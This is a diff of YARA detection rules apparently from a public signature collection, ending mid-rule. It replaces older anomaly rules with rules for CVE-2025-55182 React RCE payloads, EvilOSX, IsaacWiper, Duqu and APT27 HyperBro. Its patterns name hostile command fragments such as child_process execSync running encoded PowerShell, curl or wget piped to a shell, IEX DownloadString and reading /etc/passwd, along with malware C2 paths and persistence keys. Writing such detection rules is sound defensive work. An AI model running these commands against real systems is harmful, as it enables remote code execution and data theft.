-		description = "Detects an ASUS tuning tool with a suspicious size"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d22a1bf9-55d6-5cb4-9537-ad13b23af4d1"
-		date = "2018-10-17"
-		modified = "2022-12-21"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L398-L413"
+		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182) but could be used in other JavaScript based PoC code as well"
+		author = "Florian Roth"
+		id = "83ef1573-b35b-51c6-8342-68ce2ac577de"
+		date = "2025-12-05"
+		modified = "2025-12-06"
+		reference = "https://github.com/msanft/CVE-2025-55182/blob/main/poc.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L84-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5aadb48f61947ff0362bde5f80830b835ca9e3cb7e1c632d153d0ea5f8bbad6c"
-		score = 60
-		quality = 85
-		tags = "FILE"
-		noarchivescan = 1
-		hash1 = "d4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a"
+		logic_hash = "142749ac6538d80a9c713eb19b763063e4d788e622f4938ecd0c1edbf51b3c74"
+		score = 70
+		quality = 60
+		tags = "CVE-2025-55182, FILE"
 
 	strings:
-		$s1 = "\\Release\\ASGT.pdb" ascii
+		$xr1 = /process\.mainModule\.require\(["']child_process["']\).{5,40}\(["'](whoami|powershell|\/bin\/sh|\/bin\/bash|wget|curl|cat \/etc\/passwd|uname|id["'])/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and filesize > 70KB and all of them
+		1 of them and not uint16( 0 ) == 0x3c3f
 }
-rule SIGNATURE_BASE_SUSP_Piratedoffice_2007 : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_JS_POC_RSC_Detector_Payloads_Dec25 : CVE_2025_55182
 {
 	meta:
-		description = "Detects an Office document that was created with a pirated version of MS Office 2007"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b36e9a59-7617-503b-968d-5b6b72b227ea"
-		date = "2018-12-04"
-		modified = "2025-08-13"
-		reference = "https://twitter.com/pwnallthethings/status/743230570440826886?lang=en"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L415-L428"
+		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182) as used in the RSC Detector browser extension but could be used in other JavaScript based PoC code as well"
+		author = "Florian Roth"
+		id = "62cc724e-f8eb-50d7-97f7-a63d74490eb3"
+		date = "2025-12-06"
+		modified = "2025-12-12"
+		reference = "https://github.com/mrknow001/RSC_Detector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L100-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff94483944a4a4e4bc3cba26fc08fc2a5239f27b301b2ca7cca5edc092c2fc73"
-		score = 40
+		logic_hash = "b51f4028662795ffcbf4c17c1b2cbad35a8fa64104aa5cfdaf24b13e9663eb09"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "210448e58a50da22c0031f016ed1554856ed8abe79ea07193dc8f5599343f633"
+		tags = "CVE-2025-55182"
 
 	strings:
-		$s7 = "<Company>Grizli777</Company>" ascii
+		$s1 = "process.mainModule.require('child_process').execSync("
+		$s2 = ").toString('base64');"
+		$f1 = "echo vulnerability_test"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 300KB and all of them
+		all of ( $s* ) and not 1 of ( $f* )
 }
-rule SIGNATURE_BASE_SUSP_Scheduled_Task_Bigsize : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_JS_Exploitation_Payloads_Dec25 : CVE_2025_55182
 {
 	meta:
-		description = "Detects suspiciously big scheduled task XML file as seen in combination with embedded base64 encoded PowerShell code"
-		author = "Florian Roth (Nextron Systems)"
-		id = "61b07b30-1058-5a53-99e7-2c48ec9d23b5"
-		date = "2018-12-06"
-		modified = "2025-08-13"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L430-L446"
+		description = "Detects RCE indicators related to the exploitation attempts of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) as observed in the wild"
+		author = "Florian Roth"
+		id = "341c955d-9ab1-5c3a-9f84-93c2a50b596e"
+		date = "2025-12-06"
+		modified = "2025-12-12"
+		reference = "https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L118-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dcc06261b1ea39c587d8bcefbb8e85e6b9016da01bf66c2eefe5bd7bbdfc6968"
-		score = 65
-		quality = 85
-		tags = "FILE"
+		logic_hash = "6ddad54b8869ff3eadc3040767ef4cac5a81132b74a5d16cfe479a8dddd52a65"
+		score = 70
+		quality = 60
+		tags = "CVE-2025-55182"
 
 	strings:
-		$a0 = "<Task version=" ascii wide
-		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" ascii wide
-		$fp1 = "</Counter><Counter>" wide
-		$fp2 = "Office Feature Updates Logon" wide
-		$fp3 = "Microsoft Shared" fullword wide
+		$a1 = "process.mainModule.require('child_process')"
+		$x1 = ".execSync('powershell -enc SQBFAFgAIAA"
+		$sa1 = ".execSync('powershell"
+		$sa2 = ".execSync('curl "
+		$sa3 = ".execSync('wget "
+		$sb01 = " -e "
+		$sb02 = " -ec "
+		$sb03 = " -en "
+		$sb04 = " -enc "
+		$sb05 = " -enco "
+		$sb06 = " -encodedcommand "
+		$sb07 = " | bash"
+		$sb08 = " | sh"
+		$sb09 = "|bash"
+		$sb10 = "|sh"
+		$sc1 = ").DownloadString(" ascii wide base64
+		$sc2 = "IEX (New-Object " ascii wide base64
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize > 20KB and all of ( $a* ) and not 1 of ( $fp* )
+		$a1 and ( 1 of ( $x* ) or ( 1 of ( $sa* ) and 1 of ( $sb* ) ) or 1 of ( $sc* ) )
 }
-rule SIGNATURE_BASE_SUSP_Putty_Unnormal_Size : FILE
+rule SIGNATURE_BASE_OSX_Backdoor_Evilosx : FILE
 {
 	meta:
-		description = "Detects a putty version with a size different than the one provided by Simon Tatham (could be caused by an additional signature or malware)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "576b118c-d4be-5ce2-994a-ce3f943dda88"
-		date = "2019-01-07"
-		modified = "2022-06-30"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L448-L498"
+		description = "EvilOSX MacOS/OSX backdoor"
+		author = "John Lambert @JohnLaTwC"
+		id = "6940e355-53d2-51e3-afd0-13303a311e9a"
+		date = "2018-02-23"
+		modified = "2023-12-05"
+		reference = "https://github.com/Marten4n6/EvilOSX, https://twitter.com/JohnLaTwC/status/966139336436498432"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_osx_evilosx.yar#L1-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2f2c21cc25eaba8c1812db617203427a59e9a55f8620676e4bbe4cb3cd4071fd"
-		score = 50
-		quality = 85
+		hash = "89e5b8208daf85f549d9b7df8e2a062e47f15a5b08462a4224f73c0a6223972a"
+		logic_hash = "393abf7cf74f8d079049cf8f0bdb3a79bf16185c80c43b823e19b67a9031aef6"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		hash1 = "e5e89bdff733d6db1cffe8b3527e823c32a78076f8eadc2f9fd486b74a0e9d88"
-		hash2 = "ce4c1b718b54973291aefdd63d1cca4e4d8d4f5353a2be7f139a290206d0c170"
-		hash3 = "adb72ea4eab7b2efc2da6e72256b5a3bb388e9cdd4da4d3ff42a9fec080aa96f"
-		hash4 = "1c0bd6660fa43fa90bd88b56cdd4a4c2ffb4ef9d04e8893109407aa7039277db"
 
 	strings:
-		$s1 = "SSH, Telnet and Rlogin client" fullword wide
-		$v1 = "Release 0.6" wide
-		$v2 = "Release 0.70" wide
-		$fp1 = "KiTTY fork" fullword wide
+		$h1 = "#!/usr/bin/env"
+		$s0 = "import base64" fullword ascii
+		$s1 = "b64decode" fullword ascii
+		$x0 = "EvilOSX" fullword ascii
+		$x1 = "get_launch_agent_directory" fullword ascii
+		$enc_x0 = /(AHYAaQBsAE8AUwBYA|dmlsT1NY|RQB2AGkAbABPAFMAWA|RXZpbE9TW|UAdgBpAGwATwBTAFgA|V2aWxPU1)/ ascii
+		$enc_x1 = /(AGUAdABfAGwAYQB1AG4AYwBoAF8AYQBnAGUAbgB0AF8AZABpAHIAZQBjAHQAbwByAHkA|cAZQB0AF8AbABhAHUAbgBjAGgAXwBhAGcAZQBuAHQAXwBkAGkAcgBlAGMAdABvAHIAeQ|dldF9sYXVuY2hfYWdlbnRfZGlyZWN0b3J5|Z2V0X2xhdW5jaF9hZ2VudF9kaXJlY3Rvcn|ZwBlAHQAXwBsAGEAdQBuAGMAaABfAGEAZwBlAG4AdABfAGQAaQByAGUAYwB0AG8AcgB5A|ZXRfbGF1bmNoX2FnZW50X2RpcmVjdG9ye)/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1 and 1 of ( $v* ) and not 1 of ( $fp* ) and filesize != 524288 and filesize != 495616 and filesize != 483328 and filesize != 524288 and filesize != 712176 and filesize != 828400 and filesize != 569328 and filesize != 454656 and filesize != 531368 and filesize != 524288 and filesize != 483328 and filesize != 713592 and filesize != 829304 and filesize != 571256 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 640000 and filesize != 650720 and filesize != 662808 and filesize != 651256 and filesize != 664432
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 30KB and all of ( $s* ) and 1 of ( $x* ) or 1 of ( $enc_x* )
 }
-rule SIGNATURE_BASE_SUSP_RTF_Header_Anomaly : FILE
+
+rule SIGNATURE_BASE_MAL_WIPER_Isaacwiper_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects malformed RTF header often used to trick mechanisms that check for a full RTF header"
+		description = "Detects IsaacWiper malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb362640-9a45-5ee5-8749-3980e0549932"
-		date = "2019-01-20"
-		modified = "2022-09-15"
-		reference = "https://twitter.com/ItsReallyNick/status/975705759618158593"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L500-L512"
+		id = "97d8d8dd-db65-5156-8f97-56c620cf2d56"
+		date = "2022-03-03"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_isaacwiper.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c0be95894edc861cf322309f2c86a8ab986bb111dfdeea1990b4a074d5ab9ea3"
-		score = 50
+		logic_hash = "6fe7d1536db5fc30c9b4a171be66993fc69e6a1d96dae00be4170bdb4a53afb8"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
+		hash2 = "7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0"
+
+	strings:
+		$s1 = "C:\\ProgramData\\log.txt" wide fullword
+		$s2 = "Cleaner.dll" ascii fullword
+		$s3 = "-- system logical drive: " wide fullword
+		$s4 = "-- FAILED" wide fullword
+		$op1 = { 8b f1 80 3d b0 66 03 10 00 0f 85 96 00 00 00 33 c0 40 b9 a8 66 03 10 87 01 33 db }
+		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 a2 c8 01 10 2b c1 6a 04 }
+		$op3 = { 8d 4d f4 ff 75 08 e8 12 ff ff ff 68 88 39 03 10 8d 45 f4 50 e8 2d 1d 00 00 cc }
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and not uint8( 4 ) == 0x66
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "a4b162717c197e11b76a4d9bc58ea25d" or 3 of them )
 }
-rule SIGNATURE_BASE_APT_RANCOR_JS_Malware : FILE
+rule SIGNATURE_BASE_Duqu1_5_Modules
 {
 	meta:
-		description = "Rancor Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "83dd9567-199e-511c-8c9a-96422bd793e7"
-		date = "2018-06-26"
+		description = "Detection for Duqu 1.5 modules"
+		author = "Silas Cutler (havex@chronicle.security)"
+		id = "7239f5e1-c08f-566c-8998-f7dacc2c4a29"
+		date = "2019-04-09"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L13-L28"
+		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_duqu1_5_modules.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d1e86d4395d4f84518750b5d58d15ed79b79570fbe50010d5d790b4c2511bb2"
+		hash = "bb3961e2b473c22c3d5939adeb86819eb846ccd07f5736abb5e897918580aace"
+		logic_hash = "795107e227cfb73f6ea09fcdb078f8b57a30d47a2cb702b2d47cc936dea5ae9f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458"
+		tags = ""
 
 	strings:
-		$x1 = ",0,0 >%SystemRoot%\\system32\\spool\\drivers\\color\\fb.vbs\",0,0" fullword ascii
-		$x2 = "CreateObject(\"Wscript.Shell\").Run \"explorer.exe \"\"http" ascii
-		$x3 = "CreateObject(\"Wscript.Shell\").Run \"schtasks /create" ascii
+		$c1 = "%s(%d)disk(%d)fdisk(%d)"
+		$c2 = "\\Device\\Floppy%d" wide
+		$c3 = "BrokenAudio" wide
+		$m1 = { 81 3F E9 18 4B 7E}
+		$m2 = { 81 BC 18 F8 04 00 00 B3 20 EA B4 }
 
 	condition:
-		uint16( 0 ) == 0x533c and filesize < 1KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Variant : FILE
+
+rule SIGNATURE_BASE_APT_RU_APT27_Hyperbro_Vftrace_Loader_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects PLAINTEE malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f5b68079-0517-504d-a45f-f6ced532db82"
-		date = "2018-06-26"
+		description = "Yara rule to detect first Hyperbro Loader Stage, often called vftrace.dll. Detects decoding function."
+		author = "Bundesamt fuer Verfassungsschutz (modified by Florian Roth)"
+		id = "b049e163-2694-5fb9-a3a3-98cc77bcd0ca"
+		date = "2022-01-14"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L30-L49"
+		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d22aa91d0f66dbb85b79c0f121f0508135bf817929d81f3ff0b3fdf223ba53ec"
+		logic_hash = "d8785ea937891636bea5ed8128de44fa6084a1a48800c1586739c5ca9e4c43bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31"
-		hash2 = "bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e"
+		sharing = "TLP:WHITE"
+		hash1 = "333B52C2CFAC56B86EE9D54AEF4F0FF4144528917BC1AA1FE1613EFC2318339A"
 
 	strings:
-		$s1 = "payload.dat" fullword ascii
-		$s3 = "temp_microsoft_test.txt" fullword ascii
-		$s4 = "reg add %s /v %s /t REG_SZ /d \"%s\"" fullword ascii
-		$s6 = "%s %s,helloworld2" fullword ascii
-		$s9 = "%s \\\"%s\\\",helloworld" fullword ascii
-		$s16 = "recv plugin type %s size:%d" fullword ascii
+		$decoder_routine = { 8A ?? 41 10 00 00 8B ?? 28 ?? ?? 4? 3B ?? 72 ?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5MB and $decoder_routine and pe.exports ( "D_C_Support_SetD_File" )
 }
 
-rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Malware_Exports : FILE
+rule SIGNATURE_BASE_APT_CN_APT27_Compromised_Certficate_Jan22_1
 {
 	meta:
-		description = "Detects PLAINTEE malware"
+		description = "Detects compromised certifcates used by APT27 malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa1e678d-8357-522b-9167-31321ab7753f"
-		date = "2018-06-26"
+		id = "f2f015af-219d-51ab-9529-01687a879ebb"
+		date = "2022-01-29"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L51-L62"
+		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L21-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa55452d4639dbaec760277908906c4ff9e8b66a60b1bcdc157ce23bd5d596db"
-		score = 75
+		logic_hash = "94a40d55936fc341eaba5e1accc8bfe3a401114298e7a3cc4d5c64af36eadf9e"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+		tags = ""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "Add" ) and pe.exports ( "Sub" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+		for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and pe.signatures [ i ] . serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6" )
 }
-
-rule SIGNATURE_BASE_APT_RANCOR_DDKONG_Malware_Exports : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Decrypted_Stage2 : FILE
 {
 	meta:
-		description = "Detects DDKONG malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c94d4ea2-7c16-5003-98ea-253f8a2d01d1"
-		date = "2018-06-26"
+		description = "HyperBro Stage 2 and compressed Stage 3 detection"
+		author = "Moritz Oettle"
+		id = "039e5d41-eadb-5c53-82cd-20ffd4105326"
+		date = "2022-02-07"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L64-L75"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L35-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d11d46530c22b323c504344448d91fd43c0eecd29cf29aa4da7b2c797d27ff9"
+		logic_hash = "6eb56c4a92e89977e536ccc3c70170062aca072c6981b40aeea184ea2ca461a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
+		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
+
+	strings:
+		$lznt1_compressed_pe_header_small = { FC B9 00 4D 5A 90 }
+		$lznt1_compressed_pe_header_large_1 = { FC B9 00 4D 5A 90 00 03 00 00 00 82 04 00 30 FF FF 00 }
+		$lznt1_compressed_pe_header_large_2 = { 00 b8 00 38 0d 01 00 40 04 38 19 00 10 01 00 00 }
+		$lznt1_compressed_pe_header_large_3 = { 00 0e 1f ba 0e 00 b4 09 cd 00 21 b8 01 4c cd 21 }
+		$lznt1_compressed_pe_header_large_4 = { 54 68 00 69 73 20 70 72 6f 67 72 00 61 6d 20 63 }
+		$lznt1_compressed_pe_header_large_5 = { 61 6e 6e 6f 00 74 20 62 65 20 72 75 6e 00 20 69 }
+		$lznt1_compressed_pe_header_large_6 = { 6e 20 44 4f 53 20 00 6d 6f 64 65 2e 0d 0d 0a 02 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "ServiceMain" ) and pe.exports ( "Rundll32Call" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
+		filesize < 200KB and ( $lznt1_compressed_pe_header_small at 0x9ce ) or ( all of ( $lznt1_compressed_pe_header_large_* ) )
 }
-rule SIGNATURE_BASE_SUSP_LNK_Big_Link_File : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3 : FILE
 {
 	meta:
-		description = "Detects a suspiciously big LNK file - maybe with embedded content"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e130f213-53fc-56d6-b1d5-0508a7e18e61"
-		date = "2018-05-15"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_lnk.yar#L2-L12"
+		description = "HyperBro Stage 3 detection - also tested in memory"
+		author = "Markus Poelloth"
+		id = "b4002777-f129-5177-a8f1-690012a207fa"
+		date = "2022-02-07"
+		modified = "2023-01-07"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L59-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e44483583249939494e76f14b022e698ba59dfe8b58133a69135144ef60c743"
-		score = 65
+		logic_hash = "49c1e70d63d93244b4b44525f2b30c05512b5f3a30d6d7c43c9366a95c84e79b"
+		score = 50
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
+
+	strings:
+		$s1 = "\\cmd.exe /A" wide
+		$s2 = "vftrace.dll" fullword wide
+		$s3 = "msmpeng.exe" fullword wide
+		$s4 = "\\\\.\\pipe\\testpipe" fullword wide
+		$s5 = "thumb.dat" fullword wide
+		$g1 = "%s\\%d.exe" fullword wide
+		$g2 = "https://%s:%d/api/v2/ajax" fullword wide
+		$g3 = " -k networkservice" fullword wide
+		$g4 = " -k localservice" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 200KB
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( ( 4 of ( $s* ) ) or ( 4 of ( $g* ) ) )
 }
-rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Sleepgenerator
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_C2
 {
 	meta:
-		description = "Detects the algorithm used to determine the next sleep timer"
-		author = "Mandiant"
-		id = "b9cd46e4-0e06-5ead-8379-adcfc3c384d0"
-		date = "2022-12-14"
+		description = "HyperBro Stage 3 C2 path and user agent detection - also tested in memory"
+		author = "Marc Stroebel"
+		id = "d1fe03b9-440c-5127-9572-dddcd5c9966b"
+		date = "2022-02-07"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ru_sparepart_dec22.yar#L2-L20"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L86-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f9cd5b145e372553dded92628db038d8"
-		logic_hash = "41a9fdb2ba7aefcaf6ef2477b598e98b9045ef17ce9bfe46f3169d0b2e0dd289"
+		logic_hash = "676df1eaa782c6b876df138a0ddddc3c63e277b84d4414b044314ee219674420"
 		score = 50
-		quality = 85
+		quality = 81
 		tags = ""
-		version = "1"
-		weight = "100"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
 
 	strings:
-		$ = {C1 E8 06 89 [5] C1 E8 02 8B}
-		$ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}
-		$ = {8B 80 FC 00 00 00}
-		$ = {D1 E8 [4] c1 E1 0f 0b c1}
+		$s1 = "api/v2/ajax" ascii wide nocase
+		$s2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" ascii wide nocase
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Struct : FILE
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_Persistence
 {
 	meta:
-		description = "Detects the PDB and a struct used in SPAREPART"
-		author = "Mandiant"
-		id = "a04296d5-c146-5142-a8e8-418651f6b755"
-		date = "2022-12-14"
+		description = "HyperBro Stage 3 registry keys for persistence"
+		author = "Marko Dorfhuber"
+		id = "2bb1d28b-5fc4-5f0b-b546-c8b8192b0d48"
+		date = "2022-02-07"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ru_sparepart_dec22.yar#L22-L39"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f9cd5b145e372553dded92628db038d8"
-		logic_hash = "807c7404146c08995440987aef78ecde11224f7d6cad1a0d22269b2bf46a44e5"
-		score = 50
+		logic_hash = "db4b7be2bafe29b5e7c81a90e17a660cf73cff1c2e8edd04a9421daba09e3e0e"
+		score = 75
 		quality = 85
+		tags = ""
+		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
+
+	strings:
+		$ = "SOFTWARE\\WOW6432Node\\Microsoft\\config_" ascii
